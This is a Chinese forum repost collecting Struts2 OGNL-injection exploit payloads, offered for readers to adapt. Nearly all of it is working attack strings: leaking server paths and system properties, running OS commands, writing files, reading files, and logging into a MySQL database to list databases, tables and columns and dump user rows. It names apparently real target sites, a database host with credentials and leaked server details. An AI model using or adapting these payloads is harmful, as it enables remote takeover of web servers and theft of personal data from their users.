stuts2 EXP POST 数据

2010版的，其他的版本，在这个基础上修个。欢迎多爆料。

网站物理路径:

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43req.getRealPath(%22u005c%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43req.getRealPath(%22u005c%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

java.版本:

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22java.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

os.name:

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

os.arch

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.arch%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

os.version

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22os.version%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

user.name

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.lang.System@getProperty(%22user.name%22))')(d))&(i99)(('43xman.getWriter().close()')(d))

user.home

网站物理路径：

java.home: 43req.getRealPath(%22u005c%22)

java.version: @java.lang.System@getProperty(%22java.version%22)

os.name: @java.lang.System@getProperty(%22os.name%22)

os.arch: @java.lang.System@getProperty(%22os.arch%22)

os.version: @java.lang.System@getProperty(%22os.version%22)

user.name: @java.lang.System@getProperty(%22user.name%22)

user.home: /usr/share/jbossas

user.dir: /var/lib/jbossas/bin

java.class.version: 49.0

java.class.path: /var/lib/jbossas/bin/run.jar:/usr/lib/jvm/java/lib/tools.jar

java.library.path: /usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64/server:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/lib/amd64:/usr/lib/jvm/java-1.5.0-sun-1.5.0.13.x86_64/jre/../lib/amd64

file.separator: /

path.separator: :

java.vendor: Sun Microsystems Inc.

java.vendor.url: http://java.sun.com/

java.vm.specification.version: 1.0

java.vm.specification.vendor: Sun Microsystems Inc.

java.vm.specification.name: Java Virtual Machine Specification

java.vm.version: 1.5.0_13-b05

java.vm.vendor: Sun Microsystems Inc.

java.vm.name: Java HotSpot(TM) 64-Bit Server VM

java.specification.version: 1.5

java.specification.vender:

java.specification.name: Java Platform API Specification

java.io.tmpdir: /tmp

执行CMD

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=ls+-la

http://www.quam.net/index.action?request_locale=zh_TW&

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(h)(('[email protected]@getRuntime().exec(43req.getParameter(%22cmd%22))')(d))&(i)(('43webRootzproreader75new40java.io.DataInputStream(43webRootzpro.getInputStream())')(d))&(i01)(('43webStr75new40byte[51020]')(d))&(i1)(('43webRootzproreader.readFully(43webStr)')(d))&(i111)(('43webStr1275new40java.lang.String(43webStr)')(d))&(i2)(('[email protected]@getResponse()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(43webStr12)')(d))&(i99)(('43xman.getWriter().close()')(d))&cmd=cat+%2Ftmp%2Fhsmw.txt

上传文件数据包

('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))

POST

t=neirong&path=%2Ftmp%2Fhsmw.txt

修改POST版加&即可。

('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))

&t=neirong&path=%2Ftmp%2Fhsmw.txt

('u0023_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('u0023context['xwork.MethodAccessor.denyMethodExecution']u003du0023foo')(u0023foou003dnew%20java.lang.Boolean(%22false%22)))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('43fos75new40java.io.FileOutputStream(43req.getParameter(%22path%22))')(d))&(i3)(('43fos.write(43req.getParameter(%22t%22).getBytes())')(d))&(i4)(('43fos.close()')(d))

&t=neirong&path=/tmp/hsmw.txt

列目录

返回值（true）判断读取 @java.io.File@listRoots()[0].isDirectory()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))

目录数 @java.io.File@listRoots().length

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots().length)')(d))&(i99)(('43xman.getWriter().close()')(d))

第一个数组 @java.io.File@listRoots()[0])

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0])')(d))&(i99)(('43xman.getWriter().close()')(d))

数组返回值 @java.io.File@listRoots()[0].listFiles().length

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles().length)')(d))&(i99)(('43xman.getWriter().close()')(d))

第一个 @java.io.File@listRoots()[0].listFiles()[0].getName()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[0].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))

第2个  @java.io.File@listRoots()[0].listFiles()[1].getName()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[1].getName())')(d))&(i99)(('43xman.getWriter().close()')(d))

如何判断文件 返回值（false） @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].isDirectory())')(d))&(i99)(('43xman.getWriter().close()')(d))

判断文件大小 @java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i95)(('43xman.getWriter().println(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22].length())')(d))&(i99)(('43xman.getWriter().close()')(d))

输出文件内容

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22])

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[22]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))

@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7])

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(g)(('[email protected]@getRequest()')(d))&(i1)(('43dis75new40java.io.DataInputStream(new40java.io.FileInputStream(@java.io.File@listRoots()[0].listFiles()[19].listFiles()[7]))')(d))&(i2)(('43dos75new40java.io.DataOutputStream(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())')(d))&(i3)(('43buff75new40byte[102400]')(d))&(i4)(('43dis.skipBytes(0)')(d))&(i5)(('43size7543dis.read(43buff)')(d))&(i6)(('43dis.close()')(d))&(i7)(('43dos.writeInt(43size)')(d))&(i95)(('43dos.write(43buffu002c0u002c43size)')(d))&(i99)(('43dos.close()')(d))

—数据库操作—

rs.absolute(1) 为第1个数据库

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) 为第2个数据库

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getCatalogs()')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(1))')(d))&(i99)(('43xman.getWriter().close()')(d))&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

以此类推，访问数值为空，停止。数据库连接格式比较

&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

&psw=密码&user=账号&clazz=数据库类型&url=数据库URL（注意URL编码）

------

数据库（表查询）在原来的语句中，多出一个 &db=数据库名

rs.absolute(1) 为第1个表

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(1)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2) 为第2个表

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getTables(43req.getParameter(%22db%22)u002c%22%25%22u002c%22%25%22u002cnew40java.lang.String[]{%22TABLE%22})')(d))&(i6)(('43rs.absolute(2)')(d))&&(i95)(('43xman.getWriter().println(43rs.getString(%22TABLE_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

------

数据库（字段查询）在原来的语句中，多出一个 &table=表

rs.absolute(1)为第1个字段

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(1)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

rs.absolute(2)为第2个字段

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i5)(('43rs7543con.getMetaData().getColumns(43req.getParameter(%22db%22)u002c%22%25%22u002c43req.getParameter(%22table%22)u002c%22%25%22)')(d))&(i6)(('43rs.absolute(2)')(d))&(i95)(('43xman.getWriter().println(43rs.getString(%22COLUMN_NAME%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&psw=123456&table=userinfos&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

-----

数据库（执行SQL语句）在原来的语句中，多出一个 &sql=select+count%28*%29+from+userinfos

！这里GET 的数据！POST 木有，怪了。

计算查询的字段数 （例子1）

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+count%28*%29+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

计算查询的字段数 （例子2）返回值8，就是8个字段

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(43rs.getMetaData().getColumnCount())')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

确定8以后，rs.getMetaData().getColumnName(1) 然后 rs.getMetaData().getColumnName(2) 类推8个字段。

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getMetaData().getColumnName(1)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(2)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(3)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(4)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(5)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(6)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(7)).append(%22%25%25%25%22).append(43rs.getMetaData().getColumnName(8)).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

输出内容 用rs.next()，第一条内容，是rs.next()

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

第2条，是43rs.next()%2b43rs.next() 2个

('43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('43context['xwork.MethodAccessor.denyMethodExecution']75false')(b))&('43c')(('[email protected]@EMPTY_SET')(c))&(i1)(('[email protected]@getRequest()')(d))&(i2)(('[email protected]@getResponse()')(d))&(i3)(('@java.lang.Class@forName(43req.getParameter(%22clazz%22))')(d))&(i4)(('[email protected]@getConnection(43req.getParameter(%22url%22)u002c43req.getParameter(%22user%22)u002c43req.getParameter(%22psw%22))')(d))&(i45)(('43con.setCatalog(43req.getParameter(%22db%22))')(d))&(i5)(('43rs7543con.createStatement().executeQuery(43req.getParameter(%22sql%22))')(d))&(i6)(('43rs.next()%2b43rs.next()')(d))&(i95)(('43xman.getWriter().println(new40java.lang.StringBuilder().append(43rs.getString(1)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(2)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(3)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(4)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(5)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(6)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(7)%2b%22%22).append(%22%25%25%25%22).append(43rs.getString(8)%2b%22%22).append(%22%25%25%25%22))')(d))&(i99)(('43xman.getWriter().close()')(d))&db=shanxi&sql=select+*+from+userinfos&psw=123456&user=yaolanabc&clazz=com.mysql.jdbc.Driver&url=jdbc%3Amysql%3A%2F%2Fdb.abc.yaolan.com%2Fabc%3FuseUnicode%3Dtrue%26amp%3BcharacterEncoding%3DUTF-8

第3个是 3个。

第4个是 4个。43rs.next()%2b43rs.next()%2b43rs.next()%2b43rs.next()

貌似最多只能200多个。

[原文地址]

文章来源于lcx.cc:stuts2 EXP POST 数据

相关推荐: 市民1天遭10086发4万条相同短信 移动称无法取消

央广网郑州9月13日消息 据中国之声《新闻晚高峰》报道，最近郑州市民马女士遇到一件蹊跷事，她的手机一天能收到一万多条10086发来的短信。这期间马女士向移动客服反映了24次，客服表示已将短信发送停掉，但仍有短信以每秒1条的速度涌进手机。 从9月11号开始，郑州…